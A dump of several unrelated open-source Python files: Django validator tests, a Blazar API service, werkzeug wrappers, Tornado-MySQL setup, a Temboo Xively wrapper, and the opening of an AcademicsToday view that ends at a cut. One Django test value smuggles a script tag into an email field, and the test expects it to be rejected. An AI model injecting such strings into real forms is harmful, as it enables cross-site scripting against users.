wyc/django | tests/validators/tests.py | 163 | 16552 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import io
import os
import re
import types
from datetime import datetime, timedelta
from unittest import TestCase
from django.core.exceptions import ValidationError
from django.core.validators import (
BaseValidator, EmailValidator, MaxLengthValidator, MaxValueValidator,
MinLengthValidator, MinValueValidator, RegexValidator, URLValidator,
int_list_validator, validate_comma_separated_integer_list, validate_email,
validate_integer, validate_ipv4_address, validate_ipv6_address,
validate_ipv46_address, validate_slug, validate_unicode_slug,
)
from django.test import SimpleTestCase
from django.test.utils import str_prefix
from django.utils._os import upath
NOW = datetime.now()
EXTENDED_SCHEMES = ['http', 'https', 'ftp', 'ftps', 'git', 'file']
TEST_DATA = [
# (validator, value, expected),
(validate_integer, '42', None),
(validate_integer, '-42', None),
(validate_integer, -42, None),
(validate_integer, -42.5, ValidationError),
(validate_integer, None, ValidationError),
(validate_integer, 'a', ValidationError),
(validate_integer, '\n42', ValidationError),
(validate_integer, '42\n', ValidationError),
(validate_email, 'email@here.com', None),
(validate_email, 'weirder-email@here.and.there.com', None),
(validate_email, 'email@[127.0.0.1]', None),
(validate_email, 'email@[2001:dB8::1]', None),
(validate_email, 'email@[2001:dB8:0:0:0:0:0:1]', None),
(validate_email, 'email@[::fffF:127.0.0.1]', None),
(validate_email, 'example@valid-----hyphens.com', None),
(validate_email, 'example@valid-with-hyphens.com', None),
(validate_email, 'test@domain.with.idn.tld.उदाहरण.परीक्षा', None),
(validate_email, 'email@localhost', None),
(EmailValidator(whitelist=['localdomain']), 'email@localdomain', None),
(validate_email, '"test@test"@example.com', None),
(validate_email, 'example@atm.%s' % ('a' * 63), None),
(validate_email, 'example@%s.atm' % ('a' * 63), None),
(validate_email, 'example@%s.%s.atm' % ('a' * 63, 'b' * 10), None),
(validate_email, 'example@atm.%s' % ('a' * 64), ValidationError),
(validate_email, 'example@%s.atm.%s' % ('b' * 64, 'a' * 63), ValidationError),
(validate_email, None, ValidationError),
(validate_email, '', ValidationError),
(validate_email, 'abc', ValidationError),
(validate_email, 'abc@', ValidationError),
(validate_email, 'abc@bar', ValidationError),
(validate_email, 'a @x.cz', ValidationError),
(validate_email, 'abc@.com', ValidationError),
(validate_email, 'something@@somewhere.com', ValidationError),
(validate_email, 'email@127.0.0.1', ValidationError),
(validate_email, 'email@[127.0.0.256]', ValidationError),
(validate_email, 'email@[2001:db8::12345]', ValidationError),
(validate_email, 'email@[2001:db8:0:0:0:0:1]', ValidationError),
(validate_email, 'email@[::ffff:127.0.0.256]', ValidationError),
(validate_email, 'example@invalid-.com', ValidationError),
(validate_email, 'example@-invalid.com', ValidationError),
(validate_email, 'example@invalid.com-', ValidationError),
(validate_email, 'example@inv-.alid-.com', ValidationError),
(validate_email, 'example@inv-.-alid.com', ValidationError),
(validate_email, 'test@example.com\n\n<script src="x.js">', ValidationError),
# Quoted-string format (CR not allowed)
(validate_email, '"\\\011"@here.com', None),
(validate_email, '"\\\012"@here.com', ValidationError),
(validate_email, 'trailingdot@shouldfail.com.', ValidationError),
# Max length of domain name labels is 63 characters per RFC 1034.
(validate_email, 'a@%s.us' % ('a' * 63), None),
(validate_email, 'a@%s.us' % ('a' * 64), ValidationError),
# Trailing newlines in username or domain not allowed
(validate_email, 'a@b.com\n', ValidationError),
(validate_email, 'a\n@b.com', ValidationError),
(validate_email, '"test@test"\n@example.com', ValidationError),
(validate_email, 'a@[127.0.0.1]\n', ValidationError),
(validate_slug, 'slug-ok', None),
(validate_slug, 'longer-slug-still-ok', None),
(validate_slug, '--------', None),
(validate_slug, 'nohyphensoranything', None),
(validate_slug, 'a', None),
(validate_slug, '1', None),
(validate_slug, 'a1', None),
(validate_slug, '', ValidationError),
(validate_slug, ' text ', ValidationError),
(validate_slug, ' ', ValidationError),
(validate_slug, 'some@mail.com', ValidationError),
(validate_slug, '你好', ValidationError),
(validate_slug, '你 好', ValidationError),
(validate_slug, '\n', ValidationError),
(validate_slug, 'trailing-newline\n', ValidationError),
(validate_unicode_slug, 'slug-ok', None),
(validate_unicode_slug, 'longer-slug-still-ok', None),
(validate_unicode_slug, '--------', None),
(validate_unicode_slug, 'nohyphensoranything', None),
(validate_unicode_slug, 'a', None),
(validate_unicode_slug, '1', None),
(validate_unicode_slug, 'a1', None),
(validate_unicode_slug, '你好', None),
(validate_unicode_slug, '', ValidationError),
(validate_unicode_slug, ' text ', ValidationError),
(validate_unicode_slug, ' ', ValidationError),
(validate_unicode_slug, 'some@mail.com', ValidationError),
(validate_unicode_slug, '\n', ValidationError),
(validate_unicode_slug, '你 好', ValidationError),
(validate_unicode_slug, 'trailing-newline\n', ValidationError),
(validate_ipv4_address, '1.1.1.1', None),
(validate_ipv4_address, '255.0.0.0', None),
(validate_ipv4_address, '0.0.0.0', None),
(validate_ipv4_address, '256.1.1.1', ValidationError),
(validate_ipv4_address, '25.1.1.', ValidationError),
(validate_ipv4_address, '25,1,1,1', ValidationError),
(validate_ipv4_address, '25.1 .1.1', ValidationError),
(validate_ipv4_address, '1.1.1.1\n', ValidationError),
# validate_ipv6_address uses django.utils.ipv6, which
# is tested in much greater detail in its own testcase
(validate_ipv6_address, 'fe80::1', None),
(validate_ipv6_address, '::1', None),
(validate_ipv6_address, '1:2:3:4:5:6:7:8', None),
(validate_ipv6_address, '1:2', ValidationError),
(validate_ipv6_address, '::zzz', ValidationError),
(validate_ipv6_address, '12345::', ValidationError),
(validate_ipv46_address, '1.1.1.1', None),
(validate_ipv46_address, '255.0.0.0', None),
(validate_ipv46_address, '0.0.0.0', None),
(validate_ipv46_address, 'fe80::1', None),
(validate_ipv46_address, '::1', None),
(validate_ipv46_address, '1:2:3:4:5:6:7:8', None),
(validate_ipv46_address, '256.1.1.1', ValidationError),
(validate_ipv46_address, '25.1.1.', ValidationError),
(validate_ipv46_address, '25,1,1,1', ValidationError),
(validate_ipv46_address, '25.1 .1.1', ValidationError),
(validate_ipv46_address, '1:2', ValidationError),
(validate_ipv46_address, '::zzz', ValidationError),
(validate_ipv46_address, '12345::', ValidationError),
(validate_comma_separated_integer_list, '1', None),
(validate_comma_separated_integer_list, '12', None),
(validate_comma_separated_integer_list, '1,2', None),
(validate_comma_separated_integer_list, '1,2,3', None),
(validate_comma_separated_integer_list, '10,32', None),
(validate_comma_separated_integer_list, '', ValidationError),
(validate_comma_separated_integer_list, 'a', ValidationError),
(validate_comma_separated_integer_list, 'a,b,c', ValidationError),
(validate_comma_separated_integer_list, '1, 2, 3', ValidationError),
(validate_comma_separated_integer_list, ',', ValidationError),
(validate_comma_separated_integer_list, '1,2,3,', ValidationError),
(validate_comma_separated_integer_list, '1,2,', ValidationError),
(validate_comma_separated_integer_list, ',1', ValidationError),
(validate_comma_separated_integer_list, '1,,2', ValidationError),
(int_list_validator(sep='.'), '1.2.3', None),
(int_list_validator(sep='.'), '1,2,3', ValidationError),
(int_list_validator(sep='.'), '1.2.3\n', ValidationError),
(MaxValueValidator(10), 10, None),
(MaxValueValidator(10), -10, None),
(MaxValueValidator(10), 0, None),
(MaxValueValidator(NOW), NOW, None),
(MaxValueValidator(NOW), NOW - timedelta(days=1), None),
(MaxValueValidator(0), 1, ValidationError),
(MaxValueValidator(NOW), NOW + timedelta(days=1), ValidationError),
(MinValueValidator(-10), -10, None),
(MinValueValidator(-10), 10, None),
(MinValueValidator(-10), 0, None),
(MinValueValidator(NOW), NOW, None),
(MinValueValidator(NOW), NOW + timedelta(days=1), None),
(MinValueValidator(0), -1, ValidationError),
(MinValueValidator(NOW), NOW - timedelta(days=1), ValidationError),
(MaxLengthValidator(10), '', None),
(MaxLengthValidator(10), 10 * 'x', None),
(MaxLengthValidator(10), 15 * 'x', ValidationError),
(MinLengthValidator(10), 15 * 'x', None),
(MinLengthValidator(10), 10 * 'x', None),
(MinLengthValidator(10), '', ValidationError),
(URLValidator(EXTENDED_SCHEMES), 'file://localhost/path', None),
(URLValidator(EXTENDED_SCHEMES), 'git://example.com/', None),
(URLValidator(EXTENDED_SCHEMES), 'git://-invalid.com', ValidationError),
# Trailing newlines not accepted
(URLValidator(), 'http://www.djangoproject.com/\n', ValidationError),
(URLValidator(), 'http://[::ffff:192.9.5.5]\n', ValidationError),
# Trailing junk does not take forever to reject
(URLValidator(), 'http://www.asdasdasdasdsadfm.com.br ', ValidationError),
(URLValidator(), 'http://www.asdasdasdasdsadfm.com.br z', ValidationError),
(BaseValidator(True), True, None),
(BaseValidator(True), False, ValidationError),
(RegexValidator(), '', None),
(RegexValidator(), 'x1x2', None),
(RegexValidator('[0-9]+'), 'xxxxxx', ValidationError),
(RegexValidator('[0-9]+'), '1234', None),
(RegexValidator(re.compile('[0-9]+')), '1234', None),
(RegexValidator('.*'), '', None),
(RegexValidator(re.compile('.*')), '', None),
(RegexValidator('.*'), 'xxxxx', None),
(RegexValidator('x'), 'y', ValidationError),
(RegexValidator(re.compile('x')), 'y', ValidationError),
(RegexValidator('x', inverse_match=True), 'y', None),
(RegexValidator(re.compile('x'), inverse_match=True), 'y', None),
(RegexValidator('x', inverse_match=True), 'x', ValidationError),
(RegexValidator(re.compile('x'), inverse_match=True), 'x', ValidationError),
(RegexValidator('x', flags=re.IGNORECASE), 'y', ValidationError),
(RegexValidator('a'), 'A', ValidationError),
(RegexValidator('a', flags=re.IGNORECASE), 'A', None),
]
def create_path(filename):
return os.path.abspath(os.path.join(os.path.dirname(upath(__file__)), filename))
# Add valid and invalid URL tests.
# This only tests the validator without extended schemes.
with io.open(create_path('valid_urls.txt'), encoding='utf8') as f:
for url in f:
TEST_DATA.append((URLValidator(), url.strip(), None))
with io.open(create_path('invalid_urls.txt'), encoding='utf8') as f:
for url in f:
TEST_DATA.append((URLValidator(), url.strip(), ValidationError))
def create_simple_test_method(validator, expected, value, num):
if expected is not None and issubclass(expected, Exception):
test_mask = 'test_%s_raises_error_%d'
def test_func(self):
# assertRaises not used, so as to be able to produce an error message
# containing the tested value
try:
validator(value)
except expected:
pass
else:
self.fail("%s not raised when validating '%s'" % (
expected.__name__, value))
else:
test_mask = 'test_%s_%d'
def test_func(self):
try:
self.assertEqual(expected, validator(value))
except ValidationError as e:
self.fail("Validation of '%s' failed. Error message was: %s" % (
value, str(e)))
if isinstance(validator, types.FunctionType):
val_name = validator.__name__
else:
val_name = validator.__class__.__name__
test_name = test_mask % (val_name, num)
return test_name, test_func
# Dynamically assemble a test class with the contents of TEST_DATA
class TestSimpleValidators(SimpleTestCase):
def test_single_message(self):
v = ValidationError('Not Valid')
self.assertEqual(str(v), str_prefix("[%(_)s'Not Valid']"))
self.assertEqual(repr(v), str_prefix("ValidationError([%(_)s'Not Valid'])"))
def test_message_list(self):
v = ValidationError(['First Problem', 'Second Problem'])
self.assertEqual(str(v), str_prefix("[%(_)s'First Problem', %(_)s'Second Problem']"))
self.assertEqual(repr(v), str_prefix("ValidationError([%(_)s'First Problem', %(_)s'Second Problem'])"))
def test_message_dict(self):
v = ValidationError({'first': ['First Problem']})
self.assertEqual(str(v), str_prefix("{%(_)s'first': [%(_)s'First Problem']}"))
self.assertEqual(repr(v), str_prefix("ValidationError({%(_)s'first': [%(_)s'First Problem']})"))
def test_regex_validator_flags(self):
try:
RegexValidator(re.compile('a'), flags=re.IGNORECASE)
except TypeError:
pass
else:
self.fail("TypeError not raised when flags and pre-compiled regex in RegexValidator")
def test_max_length_validator_message(self):
v = MaxLengthValidator(16, message='"%(value)s" has more than %(limit_value)d characters.')
with self.assertRaisesMessage(ValidationError, '"djangoproject.com" has more than 16 characters.'):
v('djangoproject.com')
test_counter = 0
for validator, value, expected in TEST_DATA:
name, method = create_simple_test_method(validator, expected, value, test_counter)
setattr(TestSimpleValidators, name, method)
test_counter += 1
class TestValidatorEquality(TestCase):
"""
Tests that validators have valid equality operators (#21638)
"""
def test_regex_equality(self):
self.assertEqual(
RegexValidator(r'^(?:[a-z0-9\.\-]*)://'),
RegexValidator(r'^(?:[a-z0-9\.\-]*)://'),
)
self.assertNotEqual(
RegexValidator(r'^(?:[a-z0-9\.\-]*)://'),
RegexValidator(r'^(?:[0-9\.\-]*)://'),
)
self.assertEqual(
RegexValidator(r'^(?:[a-z0-9\.\-]*)://', "oh noes", "invalid"),
RegexValidator(r'^(?:[a-z0-9\.\-]*)://', "oh noes", "invalid"),
)
self.assertNotEqual(
RegexValidator(r'^(?:[a-z0-9\.\-]*)://', "oh", "invalid"),
RegexValidator(r'^(?:[a-z0-9\.\-]*)://', "oh noes", "invalid"),
)
self.assertNotEqual(
RegexValidator(r'^(?:[a-z0-9\.\-]*)://', "oh noes", "invalid"),
RegexValidator(r'^(?:[a-z0-9\.\-]*)://'),
)
self.assertNotEqual(
RegexValidator('', flags=re.IGNORECASE),
RegexValidator(''),
)
self.assertNotEqual(
RegexValidator(''),
RegexValidator('', inverse_match=True),
)
def test_regex_equality_nocache(self):
pattern = r'^(?:[a-z0-9\.\-]*)://'
left = RegexValidator(pattern)
re.purge()
right = RegexValidator(pattern)
self.assertEqual(
left,
right,
)
def test_regex_equality_blank(self):
self.assertEqual(
RegexValidator(),
RegexValidator(),
)
def test_email_equality(self):
self.assertEqual(
EmailValidator(),
EmailValidator(),
)
self.assertNotEqual(
EmailValidator(message="BAD EMAIL"),
EmailValidator(),
)
self.assertEqual(
EmailValidator(message="BAD EMAIL", code="bad"),
EmailValidator(message="BAD EMAIL", code="bad"),
)
def test_basic_equality(self):
self.assertEqual(
MaxValueValidator(44),
MaxValueValidator(44),
)
self.assertNotEqual(
MaxValueValidator(44),
MinValueValidator(44),
)
self.assertNotEqual(
MinValueValidator(45),
MinValueValidator(11),
)
| bsd-3-clause |
ChameleonCloud/blazar | blazar/api/v1/devices/service.py | 1 | 3761 | # Copyright (c) 2018 StackHPC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from blazar import context
from blazar.manager.devices import rpcapi as manager_rpcapi
from blazar import policy
from blazar.utils import trusts
class API(object):
def __init__(self):
self.manager_rpcapi = manager_rpcapi.ManagerRPCAPI()
@policy.authorize('devices', 'get')
def get_devices(self):
"""List all existing devices."""
return self.manager_rpcapi.list_devices()
@policy.authorize('devices', 'post')
@trusts.use_trust_auth()
def create_device(self, data):
"""Create new device.
:param data: New device characteristics.
:type data: dict
"""
return self.manager_rpcapi.create_device(data)
@policy.authorize('devices', 'get')
def get_device(self, device_id):
"""Get device by its ID.
:param device_id: ID of the device in Blazar DB.
:type device_id: str
"""
return self.manager_rpcapi.get_device(device_id)
@policy.authorize('devices', 'put')
def update_device(self, device_id, data):
"""Update device.
:param device_id: ID of the device in Blazar DB.
:type device_id: str
:param data: New device characteristics.
:type data: dict
"""
return self.manager_rpcapi.update_device(device_id, data)
@policy.authorize('devices', 'delete')
def delete_device(self, device_id):
"""Delete specified device.
:param device_id: ID of the device in Blazar DB.
:type device_id: str
"""
self.manager_rpcapi.delete_device(device_id)
@policy.authorize('devices', 'reallocate')
def reallocate(self, device_id, data):
"""Exchange device from allocations."""
return self.manager_rpcapi.reallocate(device_id, data)
@policy.authorize('devices', 'get_allocations')
def list_allocations(self, query):
"""List all allocations on all devices.
:param query: parameter to query allocations
:type query: dict
"""
ctx = context.current()
detail = False
if policy.enforce(ctx, 'admin', {}, do_raise=False):
detail = True
return self.manager_rpcapi.list_allocations(query, detail=detail)
@policy.authorize('devices', 'get_allocations')
def get_allocations(self, device_id, query):
"""List all allocations on a specificied device.
:param device_id: ID of the device in Blazar BDself.
:type device_id: str
:param query: parameters to query allocation
:type query: dict
"""
return self.manager_rpcapi.get_allocations(device_id, query)
@policy.authorize('devices', 'get_resource_properties')
def list_resource_properties(self, query):
"""List resource properties for devices."""
return self.manager_rpcapi.list_resource_properties(query)
@policy.authorize('devices', 'patch_resource_properties')
def update_resource_property(self, property_name, data):
"""Update a device resource property."""
return self.manager_rpcapi.update_resource_property(property_name,
data)
| apache-2.0 |
jcmarks/jcmarks-mobile | lib/werkzeug/contrib/wrappers.py | 318 | 10331 | # -*- coding: utf-8 -*-
"""
werkzeug.contrib.wrappers
~~~~~~~~~~~~~~~~~~~~~~~~~
Extra wrappers or mixins contributed by the community. These wrappers can
be mixed in into request objects to add extra functionality.
Example::
from werkzeug.wrappers import Request as RequestBase
from werkzeug.contrib.wrappers import JSONRequestMixin
class Request(RequestBase, JSONRequestMixin):
pass
Afterwards this request object provides the extra functionality of the
:class:`JSONRequestMixin`.
:copyright: (c) 2013 by the Werkzeug Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
import codecs
try:
from simplejson import loads
except ImportError:
from json import loads
from werkzeug.exceptions import BadRequest
from werkzeug.utils import cached_property
from werkzeug.http import dump_options_header, parse_options_header
from werkzeug._compat import wsgi_decoding_dance
def is_known_charset(charset):
"""Checks if the given charset is known to Python."""
try:
codecs.lookup(charset)
except LookupError:
return False
return True
class JSONRequestMixin(object):
"""Add json method to a request object. This will parse the input data
through simplejson if possible.
:exc:`~werkzeug.exceptions.BadRequest` will be raised if the content-type
is not json or if the data itself cannot be parsed as json.
"""
@cached_property
def json(self):
"""Get the result of simplejson.loads if possible."""
if 'json' not in self.environ.get('CONTENT_TYPE', ''):
raise BadRequest('Not a JSON request')
try:
return loads(self.data)
except Exception:
raise BadRequest('Unable to read JSON request')
class ProtobufRequestMixin(object):
"""Add protobuf parsing method to a request object. This will parse the
input data through `protobuf`_ if possible.
:exc:`~werkzeug.exceptions.BadRequest` will be raised if the content-type
is not protobuf or if the data itself cannot be parsed property.
.. _protobuf: http://code.google.com/p/protobuf/
"""
#: by default the :class:`ProtobufRequestMixin` will raise a
#: :exc:`~werkzeug.exceptions.BadRequest` if the object is not
#: initialized. You can bypass that check by setting this
#: attribute to `False`.
protobuf_check_initialization = True
def parse_protobuf(self, proto_type):
"""Parse the data into an instance of proto_type."""
if 'protobuf' not in self.environ.get('CONTENT_TYPE', ''):
raise BadRequest('Not a Protobuf request')
obj = proto_type()
try:
obj.ParseFromString(self.data)
except Exception:
raise BadRequest("Unable to parse Protobuf request")
# Fail if not all required fields are set
if self.protobuf_check_initialization and not obj.IsInitialized():
raise BadRequest("Partial Protobuf request")
return obj
class RoutingArgsRequestMixin(object):
"""This request mixin adds support for the wsgiorg routing args
`specification`_.
.. _specification: http://www.wsgi.org/wsgi/Specifications/routing_args
"""
def _get_routing_args(self):
return self.environ.get('wsgiorg.routing_args', (()))[0]
def _set_routing_args(self, value):
if self.shallow:
raise RuntimeError('A shallow request tried to modify the WSGI '
'environment. If you really want to do that, '
'set `shallow` to False.')
self.environ['wsgiorg.routing_args'] = (value, self.routing_vars)
routing_args = property(_get_routing_args, _set_routing_args, doc='''
The positional URL arguments as `tuple`.''')
del _get_routing_args, _set_routing_args
def _get_routing_vars(self):
rv = self.environ.get('wsgiorg.routing_args')
if rv is not None:
return rv[1]
rv = {}
if not self.shallow:
self.routing_vars = rv
return rv
def _set_routing_vars(self, value):
if self.shallow:
raise RuntimeError('A shallow request tried to modify the WSGI '
'environment. If you really want to do that, '
'set `shallow` to False.')
self.environ['wsgiorg.routing_args'] = (self.routing_args, value)
routing_vars = property(_get_routing_vars, _set_routing_vars, doc='''
The keyword URL arguments as `dict`.''')
del _get_routing_vars, _set_routing_vars
class ReverseSlashBehaviorRequestMixin(object):
"""This mixin reverses the trailing slash behavior of :attr:`script_root`
and :attr:`path`. This makes it possible to use :func:`~urlparse.urljoin`
directly on the paths.
Because it changes the behavior or :class:`Request` this class has to be
mixed in *before* the actual request class::
class MyRequest(ReverseSlashBehaviorRequestMixin, Request):
pass
This example shows the differences (for an application mounted on
`/application` and the request going to `/application/foo/bar`):
+---------------+-------------------+---------------------+
| | normal behavior | reverse behavior |
+===============+===================+=====================+
| `script_root` | ``/application`` | ``/application/`` |
+---------------+-------------------+---------------------+
| `path` | ``/foo/bar`` | ``foo/bar`` |
+---------------+-------------------+---------------------+
"""
@cached_property
def path(self):
"""Requested path as unicode. This works a bit like the regular path
info in the WSGI environment but will not include a leading slash.
"""
path = wsgi_decoding_dance(self.environ.get('PATH_INFO') or '',
self.charset, self.encoding_errors)
return path.lstrip('/')
@cached_property
def script_root(self):
"""The root path of the script includling a trailing slash."""
path = wsgi_decoding_dance(self.environ.get('SCRIPT_NAME') or '',
self.charset, self.encoding_errors)
return path.rstrip('/') + '/'
class DynamicCharsetRequestMixin(object):
""""If this mixin is mixed into a request class it will provide
a dynamic `charset` attribute. This means that if the charset is
transmitted in the content type headers it's used from there.
Because it changes the behavior or :class:`Request` this class has
to be mixed in *before* the actual request class::
class MyRequest(DynamicCharsetRequestMixin, Request):
pass
By default the request object assumes that the URL charset is the
same as the data charset. If the charset varies on each request
based on the transmitted data it's not a good idea to let the URLs
change based on that. Most browsers assume either utf-8 or latin1
for the URLs if they have troubles figuring out. It's strongly
recommended to set the URL charset to utf-8::
class MyRequest(DynamicCharsetRequestMixin, Request):
url_charset = 'utf-8'
.. versionadded:: 0.6
"""
#: the default charset that is assumed if the content type header
#: is missing or does not contain a charset parameter. The default
#: is latin1 which is what HTTP specifies as default charset.
#: You may however want to set this to utf-8 to better support
#: browsers that do not transmit a charset for incoming data.
default_charset = 'latin1'
def unknown_charset(self, charset):
"""Called if a charset was provided but is not supported by
the Python codecs module. By default latin1 is assumed then
to not lose any information, you may override this method to
change the behavior.
:param charset: the charset that was not found.
:return: the replacement charset.
"""
return 'latin1'
@cached_property
def charset(self):
"""The charset from the content type."""
header = self.environ.get('CONTENT_TYPE')
if header:
ct, options = parse_options_header(header)
charset = options.get('charset')
if charset:
if is_known_charset(charset):
return charset
return self.unknown_charset(charset)
return self.default_charset
class DynamicCharsetResponseMixin(object):
"""If this mixin is mixed into a response class it will provide
a dynamic `charset` attribute. This means that if the charset is
looked up and stored in the `Content-Type` header and updates
itself automatically. This also means a small performance hit but
can be useful if you're working with different charsets on
responses.
Because the charset attribute is no a property at class-level, the
default value is stored in `default_charset`.
Because it changes the behavior or :class:`Response` this class has
to be mixed in *before* the actual response class::
class MyResponse(DynamicCharsetResponseMixin, Response):
pass
.. versionadded:: 0.6
"""
#: the default charset.
default_charset = 'utf-8'
def _get_charset(self):
header = self.headers.get('content-type')
if header:
charset = parse_options_header(header)[1].get('charset')
if charset:
return charset
return self.default_charset
def _set_charset(self, charset):
header = self.headers.get('content-type')
ct, options = parse_options_header(header)
if not ct:
raise TypeError('Cannot set charset if Content-Type '
'header is missing.')
options['charset'] = charset
self.headers['Content-Type'] = dump_options_header(ct, options)
charset = property(_get_charset, _set_charset, doc="""
The charset for the response. It's stored inside the
Content-Type header as a parameter.""")
del _get_charset, _set_charset
| apache-2.0 |
mosquito/Tornado-MySQL | tornado_mysql/__init__.py | 5 | 4381 | '''
Tornado-MySQL: A pure-Python MySQL client library for Tornado.
Copyright (c) 2010, 2013-2014 PyMySQL contributors
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
'''
VERSION = (0, 6, 3, None)
from ._compat import text_type, JYTHON, IRONPYTHON
from .constants import FIELD_TYPE
from .converters import escape_dict, escape_sequence, escape_string
from .err import Warning, Error, InterfaceError, DataError, \
DatabaseError, OperationalError, IntegrityError, InternalError, \
NotSupportedError, ProgrammingError, MySQLError
from .times import Date, Time, Timestamp, \
DateFromTicks, TimeFromTicks, TimestampFromTicks
import sys
from tornado import gen
threadsafety = 1
apilevel = "2.0"
paramstyle = "format"
class DBAPISet(frozenset):
def __ne__(self, other):
if isinstance(other, set):
return super(DBAPISet, self).__ne__(self, other)
else:
return other not in self
def __eq__(self, other):
if isinstance(other, frozenset):
return frozenset.__eq__(self, other)
else:
return other in self
def __hash__(self):
return frozenset.__hash__(self)
STRING = DBAPISet([FIELD_TYPE.ENUM, FIELD_TYPE.STRING,
FIELD_TYPE.VAR_STRING])
BINARY = DBAPISet([FIELD_TYPE.BLOB, FIELD_TYPE.LONG_BLOB,
FIELD_TYPE.MEDIUM_BLOB, FIELD_TYPE.TINY_BLOB])
NUMBER = DBAPISet([FIELD_TYPE.DECIMAL, FIELD_TYPE.DOUBLE, FIELD_TYPE.FLOAT,
FIELD_TYPE.INT24, FIELD_TYPE.LONG, FIELD_TYPE.LONGLONG,
FIELD_TYPE.TINY, FIELD_TYPE.YEAR])
DATE = DBAPISet([FIELD_TYPE.DATE, FIELD_TYPE.NEWDATE])
TIME = DBAPISet([FIELD_TYPE.TIME])
TIMESTAMP = DBAPISet([FIELD_TYPE.TIMESTAMP, FIELD_TYPE.DATETIME])
DATETIME = TIMESTAMP
ROWID = DBAPISet()
def Binary(x):
"""Return x as a binary type."""
if isinstance(x, text_type) and not (JYTHON or IRONPYTHON):
return x.encode()
return bytes(x)
@gen.coroutine
def connect(*args, **kwargs):
"""See connections.Connection.__init__() for information about defaults."""
from .connections import Connection
conn = Connection(*args, **kwargs)
yield conn.connect()
raise gen.Return(conn)
from . import connections as _orig_conn
if _orig_conn.Connection.__init__.__doc__ is not None:
connect.__doc__ = _orig_conn.Connection.__init__.__doc__ + ("""
See connections.Connection.__init__() for information about defaults.
""")
del _orig_conn
def get_client_info(): # for MySQLdb compatibility
return '.'.join(map(str, VERSION))
# we include a doctored version_info here for MySQLdb compatibility
version_info = (1,2,2,"final",0)
NULL = "NULL"
__version__ = get_client_info()
__all__ = [
'BINARY', 'Binary', 'connect', 'Connection', 'DATE', 'Date',
'Time', 'Timestamp', 'DateFromTicks', 'TimeFromTicks', 'TimestampFromTicks',
'DataError', 'DatabaseError', 'Error', 'FIELD_TYPE', 'IntegrityError',
'InterfaceError', 'InternalError', 'MySQLError', 'NULL', 'NUMBER',
'NotSupportedError', 'DBAPISet', 'OperationalError', 'ProgrammingError',
'ROWID', 'STRING', 'TIME', 'TIMESTAMP', 'Warning', 'apilevel',
'connections', 'constants', 'converters', 'cursors',
'escape_dict', 'escape_sequence', 'escape_string', 'get_client_info',
'paramstyle', 'threadsafety', 'version_info',
"NULL","__version__",
]
| mit |
lupyuen/RaspberryPiImage | home/pi/GrovePi/Software/Python/others/temboo/Library/Xively/Products/ListAllProducts.py | 5 | 2970 | # -*- coding: utf-8 -*-
###############################################################################
#
# ListAllProducts
# Returns a JSON representation of all products associated with the specified APIKey.
#
# Python versions 2.6, 2.7, 3.x
#
# Copyright 2014, Temboo Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
#
#
###############################################################################
from temboo.core.choreography import Choreography
from temboo.core.choreography import InputSet
from temboo.core.choreography import ResultSet
from temboo.core.choreography import ChoreographyExecution
import json
class ListAllProducts(Choreography):
def __init__(self, temboo_session):
"""
Create a new instance of the ListAllProducts Choreo. A TembooSession object, containing a valid
set of Temboo credentials, must be supplied.
"""
super(ListAllProducts, self).__init__(temboo_session, '/Library/Xively/Products/ListAllProducts')
def new_input_set(self):
return ListAllProductsInputSet()
def _make_result_set(self, result, path):
return ListAllProductsResultSet(result, path)
def _make_execution(self, session, exec_id, path):
return ListAllProductsChoreographyExecution(session, exec_id, path)
class ListAllProductsInputSet(InputSet):
"""
An InputSet with methods appropriate for specifying the inputs to the ListAllProducts
Choreo. The InputSet object is used to specify input parameters when executing this Choreo.
"""
def set_APIKey(self, value):
"""
Set the value of the APIKey input for this Choreo. ((required, string) The API Key provided by Xively.)
"""
super(ListAllProductsInputSet, self)._set_input('APIKey', value)
class ListAllProductsResultSet(ResultSet):
"""
A ResultSet with methods tailored to the values returned by the ListAllProducts Choreo.
The ResultSet object is used to retrieve the results of a Choreo execution.
"""
def getJSONFromString(self, str):
return json.loads(str)
def get_Response(self):
"""
Retrieve the value for the "Response" output from this Choreo execution. ((json) The response from Xively.)
"""
return self._output.get('Response', None)
class ListAllProductsChoreographyExecution(ChoreographyExecution):
def _make_result_set(self, response, path):
return ListAllProductsResultSet(response, path)
| apache-2.0 |
AcademicsToday/academicstoday-django | academicstoday_project/teacher/views/policy.py | 3 | 2947 | from django.shortcuts import render
from django.core import serializers
from django.http import HttpResponse
from django.contrib.auth.models import User
from django.contrib.auth import authenticate, login, logout
from django.contrib.auth.decorators import login_required
from django.conf import settings
import json
import datetime
from registrar.models import Teacher
from registrar.models import Course
from registrar.models import Policy
from teacher.forms import PolicyForm
@login_required(login_url='/landpage')
def policy_page(request, course_id):
course = Course.objects.get(id=course_id)
try:
